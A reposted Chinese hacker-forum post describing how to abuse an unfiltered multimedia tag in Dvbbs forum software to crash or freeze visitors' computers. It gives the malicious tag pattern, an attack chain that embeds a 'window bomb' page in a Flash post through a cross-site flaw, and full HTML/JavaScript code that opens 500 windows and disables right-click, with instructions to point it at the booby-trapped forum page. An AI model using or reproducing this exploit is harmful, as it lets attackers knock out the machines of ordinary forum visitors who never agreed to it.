发新话题
打印

[转载]动网论坛多媒体标签未过滤漏洞测试手记

[转载]动网论坛多媒体标签未过滤漏洞测试手记

信息来源:黑鹰联盟
文章作者:sniper

今天在剑鹰看到这个漏洞,就想测试一下,先找了个动网论坛,发贴的内容如下:
[MP=0,0]c:\ddos.***{/mp}
..........省去一部分。(上面的{}记得换成[])
经过测试,当贴中包含大概40个这样的语句时,就可以让WIN98内存耗尽而蓝屏。
对于WIN2000可以使CPU使用率达到满负荷,即使及时关掉IE的进程,系统仍然会出现一些不正常的现象,如右键菜单无法正常显示等。
再深入发展一下,结合动网前一段时间可以在FLASH中插入URL来跨站攻击的漏洞,如果我们在FLASH中制向的是我们特制的一个HTML页面,进入后会弹出N个包含了语句的动网页面,就可以大大加强炸弹的威力(这么多进程你关那个啊,呵呵~~~)
攻击过程:
在一个动网发一个插入了非法的多媒体标签的帖子----做一个窗口炸弹的HTML页面,将URL指向插入了多媒体标签的动网页面-----将窗口炸弹的HTML页面的URL插入FLASH中---将FLASH发到目标论坛上 //这样别人访问了这个插入了FLASH的贴就中招了~~~~
以下是HTML的代码:
复制内容到剪贴板
代码:
<html>
<head>
<title>窗口炸弹</title>
</head>
<body>
<<I>script</I> language="java<I>script</I>">for(g=0;g<500;g++){window.open("[url]www.cbhu.net[/url]")}</<I>script</I>>
<p><!--webbot bot="HTMLMarkup" startspan --><html>
<head>
</head>
<body>
<<I>script</I> language="Java<I>script</I>">
<!--
if (window.Event)
document.captureEvents(Event.MOUSEUP);
<I>function</I> nocontextmenu()
{
event.cancelBubble = true
event.returnvalue = false;
return false;
}
<I>function</I> norightclick(e)
{
if (window.Event)
{
if (e.which == 2 || e.which == 3)
return false;
}
else
if (event.button == 2 || event.button == 3)
{
event.cancelBubble = true
event.returnvalue = false;
return false;
}
}
document.oncontextmenu = nocontextmenu; // for IE5+
document.<I>onmouse</I>down = norightclick; // for all others
//-->
</<I>script</I>>
</body>
</html><!--webbot bot="HTMLMarkup" endspan -->
</p>
</body>
</html>
~~~~~~~~~~~~~~~END~~~~~~~~~~~~~~~~~
<<I>script</I> language="java<I>script</I>">for(g=0;g<500;g++){window.open("[url]www.cbhu.net[/url]")}</<I>script</I>>
把这句中www.cbhu.net换成你发准备好的插入了多媒体标签的动网页面就可以了
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

发新话题